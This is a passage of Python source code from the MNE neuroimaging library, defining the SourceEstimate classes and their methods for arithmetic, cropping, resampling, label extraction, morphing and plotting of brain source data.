tstep=tstep, subject=subject)
else:
raise ValueError('vertices has to be either a list with one or more '
'arrays or an array')
return stc
def _verify_source_estimate_compat(a, b):
"""Make sure two SourceEstimates are compatible for arith. operations"""
compat = False
if len(a.vertices) == len(b.vertices):
if all(np.array_equal(av, vv)
for av, vv in zip(a.vertices, b.vertices)):
compat = True
if not compat:
raise ValueError('Cannot combine SourceEstimates that do not have the '
'same vertices. Consider using stc.expand().')
if a.subject != b.subject:
raise ValueError('source estimates do not have the same subject '
'names, %r and %r' % (a.subject, b.subject))
class _BaseSourceEstimate(ToDataFrameMixin, object):
"""Abstract base class for source estimates
Parameters
----------
data : array of shape (n_dipoles, n_times) | 2-tuple (kernel, sens_data)
The data in source space. The data can either be a single array or
a tuple with two arrays: "kernel" shape (n_vertices, n_sensors) and
"sens_data" shape (n_sensors, n_times). In this case, the source
space data corresponds to "numpy.dot(kernel, sens_data)".
vertices : array | list of two arrays
Vertex numbers corresponding to the data.
tmin : float
Time point of the first sample in data.
tstep : float
Time step between successive samples in data.
subject : str | None
The subject name. While not necessary, it is safer to set the
subject parameter to avoid analysis errors.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Attributes
----------
subject : str | None
The subject name.
times : array of shape (n_times,)
The time vector.
vertices : array or list of arrays of shape (n_dipoles,)
The indices of the dipoles in the different source spaces. Can
be an array if there is only one source space (e.g., for volumes).
data : array of shape (n_dipoles, n_times)
The data in source space.
shape : tuple
The shape of the data. A tuple of int (n_dipoles, n_times).
"""
@verbose
def __init__(self, data, vertices=None, tmin=None, tstep=None,
subject=None, verbose=None):
kernel, sens_data = None, None
if isinstance(data, tuple):
if len(data) != 2:
raise ValueError('If data is a tuple it has to be length 2')
kernel, sens_data = data
data = None
if kernel.shape[1] != sens_data.shape[0]:
raise ValueError('kernel and sens_data have invalid '
'dimensions')
if isinstance(vertices, list):
if not all(isinstance(v, np.ndarray) for v in vertices):
raise ValueError('Vertices, if a list, must contain numpy '
'arrays')
if any(np.any(np.diff(v.astype(int)) <= 0) for v in vertices):
raise ValueError('Vertices must be ordered in increasing '
'order.')
n_src = sum([len(v) for v in vertices])
if len(vertices) == 1:
vertices = vertices[0]
elif isinstance(vertices, np.ndarray):
n_src = len(vertices)
else:
raise ValueError('Vertices must be a list or numpy array')
# safeguard the user against doing something silly
if data is not None and data.shape[0] != n_src:
raise ValueError('Number of vertices (%i) and stc.shape[0] (%i) '
'must match' % (n_src, data.shape[0]))
self._data = data
self.tmin = tmin
self.tstep = tstep
self.vertices = vertices
self.verbose = verbose
self._kernel = kernel
self._sens_data = sens_data
self._kernel_removed = False
self.times = None
self._update_times()
self.subject = _check_subject(None, subject, False)
def _remove_kernel_sens_data_(self):
"""Remove kernel and sensor space data and compute self._data
"""
if self._kernel is not None or self._sens_data is not None:
self._kernel_removed = True
self._data = np.dot(self._kernel, self._sens_data)
self._kernel = None
self._sens_data = None
def crop(self, tmin=None, tmax=None):
"""Restrict SourceEstimate to a time interval
Parameters
----------
tmin : float | None
The first time point in seconds. If None the first present is used.
tmax : float | None
The last time point in seconds. If None the last present is used.
"""
mask = _time_mask(self.times, tmin, tmax)
self.tmin = self.times[np.where(mask)[0][0]]
if self._kernel is not None and self._sens_data is not None:
self._sens_data = self._sens_data[:, mask]
else:
self._data = self._data[:, mask]
self._update_times()
return self # return self for chaining methods
@verbose
def resample(self, sfreq, npad=100, window='boxcar', n_jobs=1,
verbose=None):
"""Resample data
Parameters
----------
sfreq : float
New sample rate to use.
npad : int
Amount to pad the start and end of the data.
window : string or tuple
Window to use in resampling. See scipy.signal.resample.
n_jobs : int
Number of jobs to run in parallel.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Defaults to self.verbose.
Notes
-----
For some data, it may be more accurate to use npad=0 to reduce
artifacts. This is dataset dependent -- check your data!
Note that the sample rate of the original data is inferred from tstep.
"""
# resampling in sensor instead of source space gives a somewhat
# different result, so we don't allow it
self._remove_kernel_sens_data_()
o_sfreq = 1.0 / self.tstep
self._data = resample(self._data, sfreq, o_sfreq, npad, n_jobs=n_jobs)
# adjust indirectly affected variables
self.tstep = 1.0 / sfreq
self._update_times()
@property
def data(self):
"""Numpy array of source estimate data"""
if self._data is None:
# compute the solution the first time the data is accessed and
# remove the kernel and sensor data
self._remove_kernel_sens_data_()
return self._data
@property
def shape(self):
"""Shape of the data"""
if self._data is not None:
return self._data.shape
return (self._kernel.shape[0], self._sens_data.shape[1])
def _update_times(self):
"""Update the times attribute after changing tmin, tmax, or tstep"""
self.times = self.tmin + (self.tstep * np.arange(self.shape[1]))
def __add__(self, a):
stc = copy.deepcopy(self)
stc += a
return stc
def __iadd__(self, a):
self._remove_kernel_sens_data_()
if isinstance(a, _BaseSourceEstimate):
_verify_source_estimate_compat(self, a)
self._data += a.data
else:
self._data += a
return self
def mean(self):
"""Make a summary stc file with mean power between tmin and tmax.
Returns
-------
stc : instance of SourceEstimate
The modified stc (method operates inplace).
"""
data = self.data
tmax = self.tmin + self.tstep * data.shape[1]
tmin = (self.tmin + tmax) / 2.
tstep = tmax - self.tmin
mean_stc = SourceEstimate(self.data.mean(axis=1)[:, np.newaxis],
vertices=self.vertices, tmin=tmin,
tstep=tstep, subject=self.subject)
return mean_stc
def __sub__(self, a):
stc = copy.deepcopy(self)
stc -= a
return stc
def __isub__(self, a):
self._remove_kernel_sens_data_()
if isinstance(a, _BaseSourceEstimate):
_verify_source_estimate_compat(self, a)
self._data -= a.data
else:
self._data -= a
return self
def __truediv__(self, a):
return self.__div__(a)
def __div__(self, a):
stc = copy.deepcopy(self)
stc /= a
return stc
def __itruediv__(self, a):
return self.__idiv__(a)
def __idiv__(self, a):
self._remove_kernel_sens_data_()
if isinstance(a, _BaseSourceEstimate):
_verify_source_estimate_compat(self, a)
self._data /= a.data
else:
self._data /= a
return self
def __mul__(self, a):
stc = copy.deepcopy(self)
stc *= a
return stc
def __imul__(self, a):
self._remove_kernel_sens_data_()
if isinstance(a, _BaseSourceEstimate):
_verify_source_estimate_compat(self, a)
self._data *= a.data
else:
self._data *= a
return self
def __pow__(self, a):
stc = copy.deepcopy(self)
stc **= a
return stc
def __ipow__(self, a):
self._remove_kernel_sens_data_()
self._data **= a
return self
def __radd__(self, a):
return self + a
def __rsub__(self, a):
return self - a
def __rmul__(self, a):
return self * a
def __rdiv__(self, a):
return self / a
def __neg__(self):
stc = copy.deepcopy(self)
stc._remove_kernel_sens_data_()
stc._data *= -1
return stc
def __pos__(self):
return self
def sqrt(self):
"""Take the square root
Returns
-------
stc : instance of SourceEstimate
A copy of the SourceEstimate with sqrt(data).
"""
return self ** (0.5)
def copy(self):
"""Return copy of SourceEstimate instance"""
return copy.deepcopy(self)
def bin(self, width, tstart=None, tstop=None, func=np.mean):
"""Returns a SourceEstimate object with data summarized over time bins
Time bins of ``width`` seconds. This method is intended for
visualization only. No filter is applied to the data before binning,
making the method inappropriate as a tool for downsampling data.
Parameters
----------
width : scalar
Width of the individual bins in seconds.
tstart : scalar | None
Time point where the first bin starts. The default is the first
time point of the stc.
tstop : scalar | None
Last possible time point contained in a bin (if the last bin would
be shorter than width it is dropped). The default is the last time
point of the stc.
func : callable
Function that is applied to summarize the data. Needs to accept a
numpy.array as first input and an ``axis`` keyword argument.
Returns
-------
stc : instance of SourceEstimate
The binned SourceEstimate.
"""
if tstart is None:
tstart = self.tmin
if tstop is None:
tstop = self.times[-1]
times = np.arange(tstart, tstop + self.tstep, width)
nv, _ = self.shape
nt = len(times) - 1
data = np.empty((nv, nt), dtype=self.data.dtype)
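        # summarize each bin: samples with times[i] <= t < times[i+1] are reduced along the
        # time axis by func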
for i in range(nt):
idx = (self.times >= times[i]) & (self.times < times[i + 1])
data[:, i] = func(self.data[:, idx], axis=1)
tmin = times[0] + width / 2.
stc = _make_stc(data, vertices=self.vertices,
tmin=tmin, tstep=width, subject=self.subject)
return stc
def transform_data(self, func, idx=None, tmin_idx=None, tmax_idx=None):
"""Get data after a linear (time) transform has been applied
        The transform is applied to each source time course independently.
Parameters
----------
func : callable
The transform to be applied, including parameters (see, e.g.,
`mne.fixes.partial`). The first parameter of the function is the
input data. The first return value is the transformed data,
remaining outputs are ignored. The first dimension of the
transformed data has to be the same as the first dimension of the
input data.
idx : array | None
            Indices of source time courses for which to compute transform.
If None, all time courses are used.
tmin_idx : int | None
Index of first time point to include. If None, the index of the
first time point is used.
tmax_idx : int | None
Index of the first time point not to include. If None, time points
up to (and including) the last time point are included.
Returns
-------
data_t : ndarray
The transformed data.
Notes
-----
Applying transforms can be significantly faster if the
SourceEstimate object was created using "(kernel, sens_data)", for
the "data" parameter as the transform is applied in sensor space.
Inverse methods, e.g., "apply_inverse_epochs", or "lcmv_epochs" do
this automatically (if possible).
"""
if idx is None:
# use all time courses by default
idx = slice(None, None)
if self._kernel is None and self._sens_data is None:
if self._kernel_removed:
warnings.warn('Performance can be improved by not accessing '
'the data attribute before calling this method.')
# transform source space data directly
data_t = func(self.data[idx, tmin_idx:tmax_idx])
if isinstance(data_t, tuple):
# use only first return value
data_t = data_t[0]
else:
# apply transform in sensor space
sens_data_t = func(self._sens_data[:, tmin_idx:tmax_idx])
if isinstance(sens_data_t, tuple):
# use only first return value
sens_data_t = sens_data_t[0]
# apply inverse
data_shape = sens_data_t.shape
if len(data_shape) > 2:
# flatten the last dimensions
sens_data_t = sens_data_t.reshape(data_shape[0],
np.prod(data_shape[1:]))
data_t = np.dot(self._kernel[idx, :], sens_data_t)
# restore original shape if necessary
if len(data_shape) > 2:
data_t = data_t.reshape(data_t.shape[0], *data_shape[1:])
return data_t
def transform(self, func, idx=None, tmin=None, tmax=None, copy=False):
"""Apply linear transform
The transform is applied to each source time course independently.
Parameters
----------
func : callable
The transform to be applied, including parameters (see, e.g.,
mne.fixes.partial). The first parameter of the function is the
input data. The first two dimensions of the transformed data
should be (i) vertices and (ii) time. Transforms which yield 3D
output (e.g. time-frequency transforms) are valid, so long as the
first two dimensions are vertices and time. In this case, the
copy parameter (see below) must be True and a list of
SourceEstimates, rather than a single instance of SourceEstimate,
will be returned, one for each index of the 3rd dimension of the
transformed data. In the case of transforms yielding 2D output
(e.g. filtering), the user has the option of modifying the input
inplace (copy = False) or returning a new instance of
SourceEstimate (copy = True) with the transformed data.
idx : array | None
Indices of source time courses for which to compute transform.
If None, all time courses are used.
tmin : float | int | None
First time point to include (ms). If None, self.tmin is used.
tmax : float | int | None
Last time point to include (ms). If None, self.tmax is used.
copy : bool
If True, return a new instance of SourceEstimate instead of
modifying the input inplace.
Returns
-------
stcs : instance of SourceEstimate | list
The transformed stc or, in the case of transforms which yield
N-dimensional output (where N > 2), a list of stcs. For a list,
copy must be True.
Notes
-----
Applying transforms can be significantly faster if the
SourceEstimate object was created using "(kernel, sens_data)", for
the "data" parameter as the transform is applied in sensor space.
Inverse methods, e.g., "apply_inverse_epochs", or "lcmv_epochs" do
this automatically (if possible).
"""
# min and max data indices to include
times = np.round(1000 * self.times)
t_idx = np.where(_time_mask(times, tmin, tmax))[0]
if tmin is None:
tmin_idx = None
else:
tmin_idx = t_idx[0]
if tmax is None:
tmax_idx = None
else:
tmax_idx = t_idx[-1]
data_t = self.transform_data(func, idx=idx, tmin_idx=tmin_idx,
tmax_idx=tmax_idx)
# account for change in n_vertices
if idx is not None:
idx_lh = idx[idx < len(self.lh_vertno)]
idx_rh = idx[idx >= len(self.lh_vertno)] - len(self.lh_vertno)
verts_lh = self.lh_vertno[idx_lh]
verts_rh = self.rh_vertno[idx_rh]
else:
verts_lh = self.lh_vertno
verts_rh = self.rh_vertno
verts = [verts_lh, verts_rh]
tmin_idx = 0 if tmin_idx is None else tmin_idx
tmax_idx = -1 if tmax_idx is None else tmax_idx
tmin = self.times[tmin_idx]
times = np.arange(self.times[tmin_idx],
self.times[tmax_idx] + self.tstep / 2, self.tstep)
if data_t.ndim > 2:
# return list of stcs if transformed data has dimensionality > 2
if copy:
stcs = [SourceEstimate(data_t[:, :, a], verts, tmin,
self.tstep, self.subject)
for a in range(data_t.shape[-1])]
else:
raise ValueError('copy must be True if transformed data has '
'more than 2 dimensions')
else:
# return new or overwritten stc
stcs = self if not copy else self.copy()
stcs._data, stcs.vertices = data_t, verts
stcs.tmin, stcs.times = tmin, times
return stcs
class SourceEstimate(_BaseSourceEstimate):
"""Container for surface source estimates
Parameters
----------
data : array of shape (n_dipoles, n_times) | 2-tuple (kernel, sens_data)
The data in source space. The data can either be a single array or
a tuple with two arrays: "kernel" shape (n_vertices, n_sensors) and
"sens_data" shape (n_sensors, n_times). In this case, the source
space data corresponds to "numpy.dot(kernel, sens_data)".
vertices : list of two arrays
Vertex numbers corresponding to the data.
tmin : scalar
Time point of the first sample in data.
tstep : scalar
Time step between successive samples in data.
subject : str | None
The subject name. While not necessary, it is safer to set the
subject parameter to avoid analysis errors.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Attributes
----------
subject : str | None
The subject name.
times : array of shape (n_times,)
The time vector.
vertices : list of two arrays of shape (n_dipoles,)
The indices of the dipoles in the left and right source space.
data : array of shape (n_dipoles, n_times)
The data in source space.
shape : tuple
The shape of the data. A tuple of int (n_dipoles, n_times).
"""
@verbose
def __init__(self, data, vertices=None, tmin=None, tstep=None,
subject=None, verbose=None):
if not (isinstance(vertices, list) and len(vertices) == 2):
raise ValueError('Vertices, if a list, must contain two '
'numpy arrays')
_BaseSourceEstimate.__init__(self, data, vertices=vertices, tmin=tmin,
tstep=tstep, subject=subject,
verbose=verbose)
@verbose
def save(self, fname, ftype='stc', verbose=None):
"""Save the source estimates to a file
Parameters
----------
fname : string
The stem of the file name. The file names used for surface source
spaces are obtained by adding "-lh.stc" and "-rh.stc" (or "-lh.w"
and "-rh.w") to the stem provided, for the left and the right
hemisphere, respectively.
ftype : string
File format to use. Allowed values are "stc" (default), "w",
and "h5". The "w" format only supports a single time point.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Defaults to self.verbose.
"""
if ftype not in ('stc', 'w', 'h5'):
raise ValueError('ftype must be "stc", "w", or "h5", not "%s"'
% ftype)
lh_data = self.data[:len(self.lh_vertno)]
rh_data = self.data[-len(self.rh_vertno):]
if ftype == 'stc':
logger.info('Writing STC to disk...')
_write_stc(fname + '-lh.stc', tmin=self.tmin, tstep=self.tstep,
vertices=self.lh_vertno, data=lh_data)
_write_stc(fname + '-rh.stc', tmin=self.tmin, tstep=self.tstep,
vertices=self.rh_vertno, data=rh_data)
elif ftype == 'w':
if self.shape[1] != 1:
raise ValueError('w files can only contain a single time '
'point')
logger.info('Writing STC to disk (w format)...')
_write_w(fname + '-lh.w', vertices=self.lh_vertno,
data=lh_data[:, 0])
_write_w(fname + '-rh.w', vertices=self.rh_vertno,
data=rh_data[:, 0])
elif ftype == 'h5':
write_hdf5(fname + '-stc.h5',
dict(vertices=self.vertices, data=self.data,
tmin=self.tmin, tstep=self.tstep,
subject=self.subject), title='mnepython')
logger.info('[done]')
def __repr__(self):
if isinstance(self.vertices, list):
nv = sum([len(v) for v in self.vertices])
else:
nv = self.vertices.size
s = "%d vertices" % nv
if self.subject is not None:
s += ", subject : %s" % self.subject
s += ", tmin : %s (ms)" % (1e3 * self.tmin)
s += ", tmax : %s (ms)" % (1e3 * self.times[-1])
s += ", tstep : %s (ms)" % (1e3 * self.tstep)
s += ", data size : %s x %s" % self.shape
return "<SourceEstimate | %s>" % s
@property
def lh_data(self):
return self.data[:len(self.lh_vertno)]
@property
def rh_data(self):
return self.data[len(self.lh_vertno):]
@property
def lh_vertno(self):
return self.vertices[0]
@property
def rh_vertno(self):
return self.vertices[1]
def _hemilabel_stc(self, label):
if label.hemi == 'lh':
stc_vertices = self.vertices[0]
else:
stc_vertices = self.vertices[1]
# find index of the Label's vertices
idx = np.nonzero(in1d(stc_vertices, label.vertices))[0]
# find output vertices
vertices = stc_vertices[idx]
# find data
if label.hemi == 'rh':
values = self.data[idx + len(self.vertices[0])]
else:
values = self.data[idx]
return vertices, values
def in_label(self, label):
"""Returns a SourceEstimate object restricted to a label
SourceEstimate contains the time course of
activation of all sources inside the label.
Parameters
----------
label : Label | BiHemiLabel
The label (as created for example by mne.read_label). If the label
does not match any sources in the SourceEstimate, a ValueError is
raised.
"""
# make sure label and stc are compatible
if label.subject is not None and self.subject is not None \
and label.subject != self.subject:
raise RuntimeError('label and stc must have same subject names, '
'currently "%s" and "%s"' % (label.subject,
self.subject))
if label.hemi == 'both':
lh_vert, lh_val = self._hemilabel_stc(label.lh)
rh_vert, rh_val = self._hemilabel_stc(label.rh)
vertices = [lh_vert, rh_vert]
values = np.vstack((lh_val, rh_val))
elif label.hemi == 'lh':
lh_vert, values = self._hemilabel_stc(label)
vertices = [lh_vert, np.array([], int)]
elif label.hemi == 'rh':
rh_vert, values = self._hemilabel_stc(label)
vertices = [np.array([], int), rh_vert]
else:
raise TypeError("Expected Label or BiHemiLabel; got %r" % label)
if sum([len(v) for v in vertices]) == 0:
raise ValueError('No vertices match the label in the stc file')
label_stc = SourceEstimate(values, vertices=vertices,
tmin=self.tmin, tstep=self.tstep,
subject=self.subject)
return label_stc
def expand(self, vertices):
"""Expand SourceEstimate to include more vertices
This will add rows to stc.data (zero-filled) and modify stc.vertices
to include all vertices in stc.vertices and the input vertices.
Parameters
----------
vertices : list of array
New vertices to add. Can also contain old values.
Returns
-------
stc : instance of SourceEstimate
The modified stc (note: method operates inplace).
"""
if not isinstance(vertices, list):
raise TypeError('vertices must be a list')
if not len(self.vertices) == len(vertices):
raise ValueError('vertices must have the same length as '
'stc.vertices')
# can no longer use kernel and sensor data
self._remove_kernel_sens_data_()
inserters = list()
offsets = [0]
for vi, (v_old, v_new) in enumerate(zip(self.vertices, vertices)):
v_new = np.setdiff1d(v_new, v_old)
inds = np.searchsorted(v_old, v_new)
# newer numpy might overwrite inds after np.insert, copy here
inserters += [inds.copy()]
offsets += [len(v_old)]
self.vertices[vi] = np.insert(v_old, inds, v_new)
inds = [ii + offset for ii, offset in zip(inserters, offsets[:-1])]
inds = np.concatenate(inds)
new_data = np.zeros((len(inds), self._data.shape[1]))
self._data = np.insert(self._data, inds, new_data, axis=0)
return self
@verbose
def extract_label_time_course(self, labels, src, mode='mean_flip',
allow_empty=False, verbose=None):
"""Extract label time courses for lists of labels
This function will extract one time course for each label. The way the
time courses are extracted depends on the mode parameter.
Valid values for mode are:
- 'mean': Average within each label.
- 'mean_flip': Average within each label with sign flip depending
on source orientation.
- 'pca_flip': Apply an SVD to the time courses within each label
and use the scaled and sign-flipped first right-singular vector
as the label time course. The scaling is performed such that the
power of the label time course is the same as the average
per-vertex time course power within the label. The sign of the
resulting time course is adjusted by multiplying it with
"sign(dot(u, flip))" where u is the first left-singular vector,
              and flip is a sign-flip vector based on the vertex normals. This
procedure assures that the phase does not randomly change by 180
degrees from one stc to the next.
- 'max': Max value within each label.
Parameters
----------
labels : Label | list of Label
The labels for which to extract the time courses.
src : list
Source spaces for left and right hemisphere.
mode : str
Extraction mode, see explanation above.
allow_empty : bool
Instead of emitting an error, return all-zero time course for
labels that do not have any vertices in the source estimate.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
label_tc : array, shape=(len(labels), n_times)
Extracted time course for each label.
See Also
--------
extract_label_time_course : extract time courses for multiple STCs
"""
label_tc = extract_label_time_course(self, labels, src, mode=mode,
return_generator=False,
allow_empty=allow_empty,
verbose=verbose)
return label_tc
def center_of_mass(self, subject=None, hemi=None, restrict_vertices=False,
subjects_dir=None):
"""Return the vertex on a given surface that is at the center of mass
of the activity in stc. Note that all activity must occur in a single
        hemisphere, otherwise an error is raised. The "mass" of each point in
space for computing the spatial center of mass is computed by summing
across time, and vice-versa for each point in time in computing the
temporal center of mass. This is useful for quantifying spatio-temporal
cluster locations, especially when combined with the function
mne.source_space.vertex_to_mni().
Parameters
----------
subject : string | None
The subject the stc is defined for.
hemi : int, or None
Calculate the center of mass for the left (0) or right (1)
hemisphere. If None, one of the hemispheres must be all zeroes,
and the center of mass will be calculated for the other
hemisphere (useful for getting COM for clusters).
restrict_vertices : bool, or array of int
If True, returned vertex will be one from stc. Otherwise, it could
be any vertex from surf. If an array of int, the returned vertex
            will come from that array. For the most accurate estimates, do not
restrict vertices.
subjects_dir : str, or None
Path to the SUBJECTS_DIR. If None, the path is obtained by using
the environment variable SUBJECTS_DIR.
Returns
-------
vertex : int
Vertex of the spatial center of mass for the inferred hemisphere,
with each vertex weighted by the sum of the stc across time. For a
boolean stc, then, this would be weighted purely by the duration
each vertex was active.
hemi : int
Hemisphere the vertex was taken from.
t : float
Time of the temporal center of mass (weighted by the sum across
source vertices).
References:
Used in Larson and Lee, "The cortical dynamics underlying effective
switching of auditory spatial attention", NeuroImage 2012.
"""
subject = _check_subject(self.subject, subject)
values = np.sum(self.data, axis=1) # sum across time
vert_inds = [np.arange(len(self.vertices[0])),
np.arange(len(self.vertices[1])) + len(self.vertices[0])]
if hemi is None:
hemi = np.where(np.array([np.sum(values[vi])
for vi in vert_inds]))[0]
if not len(hemi) == 1:
raise ValueError('Could not infer hemisphere')
hemi = hemi[0]
if hemi not in [0, 1]:
raise ValueError('hemi must be 0 or 1')
subjects_dir = get_subjects_dir(subjects_dir, raise_error=True)
values = values[vert_inds[hemi]]
hemis = ['lh', 'rh']
surf = os.path.join(subjects_dir, subject, 'surf',
hemis[hemi] + '.sphere')
if isinstance(surf, string_types): # read in surface
surf = read_surface(surf)
if restrict_vertices is False:
restrict_vertices = np.arange(surf[0].shape[0])
elif restrict_vertices is True:
restrict_vertices = self.vertices[hemi]
if np.any(self.data < 0):
raise ValueError('Cannot compute COM with negative values')
pos = surf[0][self.vertices[hemi], :].T
c_o_m = np.sum(pos * values, axis=1) / np.sum(values)
# Find the vertex closest to the COM
vertex = np.argmin(np.sqrt(np.mean((surf[0][restrict_vertices, :] -
c_o_m) ** 2, axis=1)))
vertex = restrict_vertices[vertex]
# do time center of mass by using the values across space
masses = np.sum(self.data, axis=0).astype(float)
t_ind = np.sum(masses * np.arange(self.shape[1])) / np.sum(masses)
t = self.tmin + self.tstep * t_ind
return vertex, hemi, t
def plot(self, subject=None, surface='inflated', hemi='lh',
colormap='auto', time_label='time=%0.2f ms',
smoothing_steps=10, transparent=None, alpha=1.0,
time_viewer=False, config_opts=None, subjects_dir=None,
figure=None, views='lat', colorbar=True, clim='auto'):
"""Plot SourceEstimates with PySurfer
Note: PySurfer currently needs the SUBJECTS_DIR environment variable,
which will automatically be set by this function. Plotting multiple
SourceEstimates with different values for subjects_dir will cause
PySurfer to use the wrong FreeSurfer surfaces when using methods of
the returned Brain object. It is therefore recommended to set the
SUBJECTS_DIR environment variable or always use the same value for
subjects_dir (within the same Python session).
Parameters
----------
subject : str | None
The subject name corresponding to FreeSurfer environment
variable SUBJECT. If None stc.subject will be used. If that
is None, the environment will be used.
surface : str
The type of surface (inflated, white etc.).
hemi : str, 'lh' | 'rh' | 'split' | 'both'
The hemisphere to display.
colormap : str | np.ndarray of float, shape(n_colors, 3 | 4)
Name of colormap to use or a custom look up table. If array, must
be (n x 3) or (n x 4) array for with RGB or RGBA values between
0 and 255. If 'auto', either 'hot' or 'mne' will be chosen
based on whether 'lims' or 'pos_lims' are specified in `clim`.
time_label : str
How to print info about the time instant visualized.
smoothing_steps : int
The amount of smoothing.
transparent : bool | None
If True, use a linear transparency between fmin and fmid.
None will choose automatically based on colormap type.
alpha : float
Alpha value to apply globally to the overlay.
time_viewer : bool
Display time viewer GUI.
config_opts : dict
Keyword arguments for Brain initialization.
See pysurfer.viz.Brain.
subjects_dir : str
The path to the FreeSurfer subjects reconstructions.
It corresponds to FreeSurfer environment variable SUBJECTS_DIR.
figure : instance of mayavi.core.scene.Scene | None
If None, the last figure will be cleaned and a new figure will
be created.
views : str | list
View to use. See surfer.Brain().
colorbar : bool
If True, display colorbar on scene.
clim : str | dict
Colorbar properties specification. If 'auto', set clim
automatically based on data percentiles. If dict, should contain:
kind : str
Flag to specify type of limits. 'value' or 'percent'.
lims : list | np.ndarray | tuple of float, 3 elements
Note: Only use this if 'colormap' is not 'mne'.
Left, middle, and right bound for colormap.
pos_lims : list | np.ndarray | tuple of float, 3 elements
Note: Only use this if 'colormap' is 'mne'.
Left, middle, and right bound for colormap. Positive values
will be mirrored directly across zero during colormap
construction to obtain negative control points.
Returns
-------
brain : Brain
            An instance of surfer.viz.Brain from PySurfer.
"""
brain = plot_source_estimates(self, subject, surface=surface,
hemi=hemi, colormap=colormap,
time_label=time_label,
smoothing_steps=smoothing_steps,
transparent=transparent, alpha=alpha,
time_viewer=time_viewer,
config_opts=config_opts,
subjects_dir=subjects_dir, figure=figure,
views=views, colorbar=colorbar,
clim=clim)
return brain
@verbose
def to_original_src(self, src_orig, subject_orig=None,
subjects_dir=None, verbose=None):
"""Return a SourceEstimate from morphed source to the original subject
Parameters
----------
src_orig : instance of SourceSpaces
The original source spaces that were morphed to the current
subject.
subject_orig : str | None
The original subject. For most source spaces this shouldn't need
to be provided, since it is stored in the source space itself.
subjects_dir : string, or None
Path to SUBJECTS_DIR if it is not set in the environment.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
See Also
--------
morph_source_spaces
Notes
-----
.. versionadded:: 0.10.0
"""
if self.subject is None:
raise ValueError('stc.subject must be set')
src_orig = _ensure_src(src_orig, kind='surf')
subject_orig = _ensure_src_subject(src_orig, subject_orig)
data_idx, vertices = _get_morph_src_reordering(
self.vertices, src_orig, subject_orig, self.subject, subjects_dir)
return SourceEstimate(self._data[data_idx], vertices,
self.tmin, self.tstep, subject_orig)
@verbose
def morph(self, subject_to, grade=5, smooth=None, subjects_dir=None,
buffer_size=64, n_jobs=1, subject_from=None, sparse=False,
verbose=None):
"""Morph a source estimate from one subject to another
Parameters
----------
subject_to : string
Name of the subject on which to morph as named in the SUBJECTS_DIR
grade : int, list (of two arrays), or None
Resolution of the icosahedral mesh (typically 5). If None, all
vertices will be used (potentially filling the surface). If a list,
            then values will be morphed to the set of vertices specified
            in grade[0] and grade[1]. Note that specifying the vertices (e.g.,
grade=[np.arange(10242), np.arange(10242)] for fsaverage on a
standard grade 5 source space) can be substantially faster than
computing vertex locations. Note that if subject='fsaverage'
and 'grade=5', this set of vertices will automatically be used
(instead of computed) for speed, since this is a common morph.
NOTE : If sparse=True, grade has to be set to None.
smooth : int or None
Number of iterations for the smoothing of the surface data.
If None, smooth is automatically defined to fill the surface
with non-zero values.
subjects_dir : string, or None
Path to SUBJECTS_DIR if it is not set in the environment.
buffer_size : int
Morph data in chunks of `buffer_size` time instants.
Saves memory when morphing long time intervals.
n_jobs : int
Number of jobs to run in parallel.
subject_from : string
Name of the original subject as named in the SUBJECTS_DIR.
If None, self.subject will be used.
sparse : bool
Morph as a sparse source estimate. If True the only
parameters used are subject_to and subject_from,
and grade has to be None.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
stc_to : SourceEstimate
Source estimate for the destination subject.
"""
subject_from = _check_subject(self.subject, subject_from)
if sparse:
if grade is not None:
raise RuntimeError('grade must be set to None if sparse=True.')
return _morph_sparse(self, subject_from, subject_to, subjects_dir)
else:
return morph_data(subject_from, subject_to, self, grade, smooth,
subjects_dir, buffer_size, n_jobs, verbose)
def morph_precomputed(self, subject_to, vertices_to, morph_mat,
subject_from=None):
"""Morph source estimate between subjects using a precomputed matrix
Parameters
----------
subject_to : string
Name of the subject on which to morph as named in the SUBJECTS_DIR.
vertices_to : list of array of int
The vertices on the destination subject's brain.
morph_mat : sparse matrix
The morphing matrix, usually from compute_morph_matrix.
subject_from : string | None
Name of the original subject as named in the SUBJECTS_DIR.
If None, self.subject will be used.
Returns
-------
stc_to : SourceEstimate
Source estimate for the destination subject.
"""
subject_from = _check_subject(self.subject, subject_from)
return morph_data_precomputed(subject_from, subject_to, self,
vertices_to, morph_mat)
def get_peak(self, hemi=None, tmin=None, tmax=None, mode='abs',
vert_as_index=False, time_as_index=False):
"""Get location and latency of peak amplitude
Parameters
----------
hemi : {'lh', 'rh', None}
The hemi to be considered. If None, the entire source space is
considered.
tmin : float | None
The minimum point in time to be considered for peak getting.
tmax : float | None
The maximum point in time to be considered for peak getting.
mode : {'pos', 'neg', 'abs'}
How to deal with the sign of the data. If 'pos' only positive
values will be considered. If 'neg' only negative values will
be considered. If 'abs' absolute values will be considered.
Defaults to 'abs'.
vert_as_index : bool
            Whether to return the vertex index instead of its ID.
Defaults to False.
time_as_index : bool
Whether to return the time index instead of the latency.
Defaults to False.
Returns
-------
pos : int
The vertex exhibiting the maximum response, either ID or index.
latency : float | int
The time point of the maximum response, either latency in seconds
or index.
"""
data = {'lh': self.lh_data, 'rh': self.rh_data, None: self.data}[hemi]
vertno = {'lh': self.lh_vertno, 'rh': self.rh_vertno,
None: np.concatenate(self.vertices)}[hemi]
vert_idx, time_idx = _get_peak(data, self.times, tmin, tmax, mode)
return (vert_idx if vert_as_index else vertno[vert_idx],
time_idx if time_as_index else self.times[time_idx])
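# Editorial usage sketch (added by the editor, not part of the original
# module): a minimal, hedged example of querying and morphing an existing
# surface SourceEstimate. `stc` is assumed to be a SourceEstimate whose
# subject attribute is set; 'fsaverage' is only a placeholder morph target
# that must exist in SUBJECTS_DIR.
def _example_query_and_morph(stc):
    # Vertex and latency of the strongest absolute response in the left hemi.
    peak_vertex, peak_time = stc.get_peak(hemi='lh', mode='abs')
    # Morph to the common grade-5 fsaverage grid (10242 vertices per hemi).
    stc_fsaverage = stc.morph('fsaverage', grade=5, smooth=None)
    return peak_vertex, peak_time, stc_fsaverage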
class VolSourceEstimate(_BaseSourceEstimate):
"""Container for volume source estimates
Parameters
----------
